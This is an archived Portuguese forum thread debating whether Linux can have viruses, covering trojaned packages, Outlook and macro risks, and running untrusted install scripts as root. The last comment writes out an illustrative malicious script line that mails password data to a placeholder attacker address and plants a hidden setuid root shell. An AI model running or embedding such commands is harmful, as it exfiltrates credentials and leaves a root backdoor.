Esta discussão foi arquivada. Não se pode acrescentar nenhum comentário. | | | é todo o arsenal que aconselho a quem ficar com o seu *nix infectado.
"Gingó béu, gingó béu, gingó ól duei!" Gimp zZzZz |
| | | | Sim, é possível haver vírus em Linux. O Linux, como todos os sistemas, tem falhas. Não é impossível que um utilizador de Desktop, com mais ou menos conhecimentos de segurança, não caia na tentação ou não seja ludibriado a executar algum scr1pt que procure um exploit na máquina. Quantos de nós estudam a source antes de instalar um determinado programa? Garantem a 100% que o código que acabaram de compilar é 100% fidedigno? Um "simples hacking" dos servers DNS mais próximos de nós é quanto basta para redireccionar um pedido ao rpmfind ou outro para um sistema exactamente igual (quais são as hipóteses de isto acontecer?) e que contenha software malicioso. Tudo depende da frequência e da atenção que o admin do sistema dá a updates e patches. Neste cenário é possível um programa ganhar privilégios de root e instalar-se no kernel como um módulo "invisível". Ou até um binário vulgar do sistema, porque não? E alterar uma data de coisas... E esconder que o tamanho do ficheiro xpto mudou... O que este módulo faria, deixo à vossa consideração. ~avalon~ -- "Oh my gawd, they killed Tux! Bastards!" |
| | | | Todos nós sabemos que quanto mais uma coisa (qualquer coisa) se torna mainstream e conhecida, maior é a vontade de a explorar, por parte dos utilizadores. Isto aplica-se, é claro, no caso do linux para home-users e virus-writers. Nunca tendo entendido o que leva alguem a escrever um vírus, isto para além da implicita capacidade de aprendizagem, sou forçado a discordar da escrita dos mesmos. De qualquer maneira, sou forçado a deduzir que vamos começar a ver mais virus em linux (ou pelo menos mais ameaças sob a forma de shell 'scr1pts', etc). Isto é inevitavel, e chega a ser engraçado dizerem que por *nix não ter o Outlook, nao tem virus. O problema nao é o outlook mas sim teenagers com demasiado tempo livre. Frederico Oliveira fred@box.sk PS: ao escrever um comentário no gildot, ao escrever s-c-r-i-p-t (sem os hifens, é logico), é automaticamente substituido por "scr1pt". Arranjem isto. É ridiculo, para não dizer degrandante. Fiquei mesmo decepcionado... É que o gildot é português, e supostamente sério. Fica a crítica. |
| | | | | O problema nao é o outlook mas sim teenagers com demasiado tempo livre. Isto é como ter uma porta feita de papel ou cartolina, vendê-la como "segura", a casa ser assaltada (que surpresa!) e dizer que "a culpa é dos ladrões". :)
"Prepare to be seduced by my Psycho-Power!" - M. Bison, Street Fighter Alpha 3 |
| | | | Por acaso, desculpa lá, mas a culpa é dos ladrões...
Não é por eu deixar a porta de casa aberta, ou o carro destrancado que passa a ser legal roubar.. ;)
Cumps, sena...
|
| | | | Não me parece que os ladrões se preocupem com a legalidade. Se deixares o carro destrancado vais ser roubado.
-- Carlos Rodrigues |
| | | | Não estou a desculpar os ladrões. Mas a empresa que te vendeu uma porta de cartolina como sendo "segura" TEM culpa.
"Prepare to be seduced by my Psycho-Power!" - M. Bison, Street Fighter Alpha 3 |
| | | | Julgo que é propositado, para evitar malandrices... Mas há sempre maneira de se dar a volta: script ;-) ~avalon~ -- "Oh my gawd, they killed Tux! Bastards!" |
| | | | O tópico é interessante e dá panos para mangas mas o artigo não fazia muito sentido. O problema do Outlook não é um bug, é uma feature intencional que foi aproveitada para fins maliciosos: a capacidade de correr atachments automaticamente quando abres o mail, com o objectivo de adicionar mais funcionalidade ao mail. A mesma questão põe-se com as macros do Word Excel, etc que são executadas quando abres o documento (se bem me lembro o ILOVEYOU era uma macro num documento de Word). E também se põe quanto ao javascript e applets de Java que encontramos por nas páginas da web. Não há uma solução universal para esta questão: minimizar os riscos de segurança implica perder potenciais funcionalidades. Contudo, a escolha não tem de ser ON/OFF. Poderiamos, por exemplo, criar ambientes restrictos onde correr este código, definindo os parâmetros com base na origem do código. Trabalhar como utilizador não priveligiado num sistema multi-utilizador é por si uma forma de ambiente restricto que limita o potencial deste tipo de virus ao que o utilizador pode fazer. Quanto ao software que, como utilizador priveligiado, instalamos e usamos, é uma questão de ter cuidado com o que metemos nos nossos sistemas: garantir que o software provém de fontes de confiança e que não foi adulterado. Ou correr o risco... A Red Hat já assina os pacotes, a Debian caminha para lá. As outras distros não sei. Claro que com a vulgarização do Linux cada vez vai haver mais superutilizadores que não vão ter os cuidados devidos. Finalmente, bugs como Code Red e Nimda realmente exploram bugs. Mas os bugs arranjam-se. Quanto mais depressa fizerem os vírus, mais depressa se arranjam os bugs que eles exploram. ;-)
Remember to be the Killer, not the Victim! (Nuklear Girl) |
| | | | | O problema do Outlook não é um bug, é uma feature intencional que foi aproveitada para fins maliciosos: a capacidade de correr atachments automaticamente quando abres o mail, com o objectivo de adicionar mais funcionalidade ao mail. Mas isso é uma idéia má! É como uma porta sem fechadura... sem dúvida é mais "prático" não termos de andar com a chave, não é? E contudo...
"Prepare to be seduced by my Psycho-Power!" - M. Bison, Street Fighter Alpha 3 |
| | | | «Mas isso é uma idéia má!» Isso é subjectivo. Pessoalmente, se tivesse essa opção no meu MUA habitual, desligava-a. Mas cada um é senhor do seu nariz. E como disse, o Outlook não é a única origem deste tipo de problemas. Muitos (a maior parte?) dos utilizadores abre um documento no Word ou Excel que tenha recebido por email sem se preocupar se ele tem ou não macros AutoOpen. E acho que não passa pela cabeça a ninguém remover o suporte a isso.
Remember to be the Killer, not the Victim! (Nuklear Girl) |
| | | | O conceito de virus nao faz sentido num sistema gnu/linux, dado aproveitar-se de falhas no sistema para se replicar e causar os danos. Estas falhas podem ser agrupadas em "classes" de falhas.
Uma vez detectada uma classe (as vezes ate pode ser pelo surgir de um virus) esta classe sera rapidamente corrigida, sem necessidade de qualquer anti-virus.
Claro que a isto deve-se descontar a possibilidade de virus aplicacionais, por exemplo, se o mutt ou o evolution decidissem comecar a correr scr1pts automaticamente para fazer o utilizador feliz (vide outlook). Exploits devido a buffer overflows e semelhantes no parsing do email, cai na area das classes de falhas.
Quanto a trojan horses, esses nao ha hipotese de lhe dar a volta. Mesmo um anti-virus so seria capaz de dar a volta se corresse o program numa sandbox, na qual teria de ter uma copia do sistema, e depois comparar a sandbox com o sistema e verificar o que foi ou nao alterado indevidamente. Mas isto e uma questao de ficcao cientifica, de momento, ou para quem pode ($$), de hosts e maquinas virtuais dentro maquinas virtuais.
O problema dos virus nao e quem os escreve, mas a existencia de falhas que levam a possibilidade de adquirir previlegios indesejados. Nalguns ambientes isto e facil de corrigir, noutros nao. Mais uma vantagem a favor do software livre em relacao ao software proprietario.
Outra maneira de reduzir as probabilidades e _NUCA_CORRER_COISAS_COMO_ROOT_ _ESPECIALMENTE_SE_NAO_SAO_DE_CONFIANCA_. Quanto aqui se metem a instalar o gnu/linux e correr tudo como root? Va, comecem a corar. Espero que a mior parte nao faca asneiras destas, mas se calhar a maior parte ja e capaz de ir buscar o software xpto que surgiu na freshmeat, e fazer configure make make install como root. Porque? em cada um destes passos pode estar a ser enviado o ficheiro de passwords do sistema para algum lado, por exemplo :)
Afinal, quando eram pequeninos as vossas mamas nao vos diziam para nao aceitarem presentes de estranhos? Julgam que so por por terem mais de 18 aninhos que isso deixa de ser valido? Apenas muda o contexto, meus caros :)
Hugs, Cyclops |
| | | | | A definição de vírus é software malicioso com a capacidade de infectar um sistema e de se replicar. Faz perfeito sentido em Linux. De acordo com esta definição, um cavalo de tróia (software malicioso que abre buracos nas medidas de segurança) pode ou não ser classificado como um vírus. Não tem nada a ver com aproveitar bugs (os mais de 50.000 que existem para DOS/Windows não precisam de nenhuma falha para obter privilégios porque estes não existem) ou meio de propagação (adulteração de executáveis/bibliotecas, email, ect).BR Remember to be the Killer, not the Victim! (Nuklear Girl) |
| | | | configure make make install como root Isto não significa forcosamente que se venha a ter o software a correr como root.
Mário Gamito "Make everything as simple as possible... but not simpler" Albert Einstein |
| | | | Os configure costumam ser shell scr1pts, executar um shell scr1pt feito por sabe-se lá quem, como root é sempre um risco, até porque é pouco provável que seja procedimento geral, verificar o que faz esse shell scr1pt.
Por outro lado, se eu não confio no scr1pt configure o mais provável é não confiar na aplicação que estou a instalar, com tal não a deveria então instalar e executar. |
| | | | Os configure costumam ser shell scripts, executar um shell script feito por sabe-se lá quem, como root é sempre um risco, até porque é pouco provável que seja procedimento geral, verificar o que faz esse shell script.
Por outro lado, se eu não confio no script configure o mais provável é não confiar na aplicação que estou a instalar, com tal não a deveria então instalar e executar. |
| | | | Isso leva-nos à questão de garantir que o software que instalamos é de confiança. Na debian-security está uma t hread sobre as possibilidades de um mirror da adulterar os pacotes de forma a comprometer a segurança do sistema. Remember to be the Killer, not the Victim! (Nuklear Girl) |
| | | | Dai que se utilize o gpg para alguma coisa :) |
| | | | mail -s passwords cracker@hotmail.com cp /bin/sh /bin/.sh chmod u+s /bin/.sh Remember to be the Killer, not the Victim! (Nuklear Girl) |
| |
|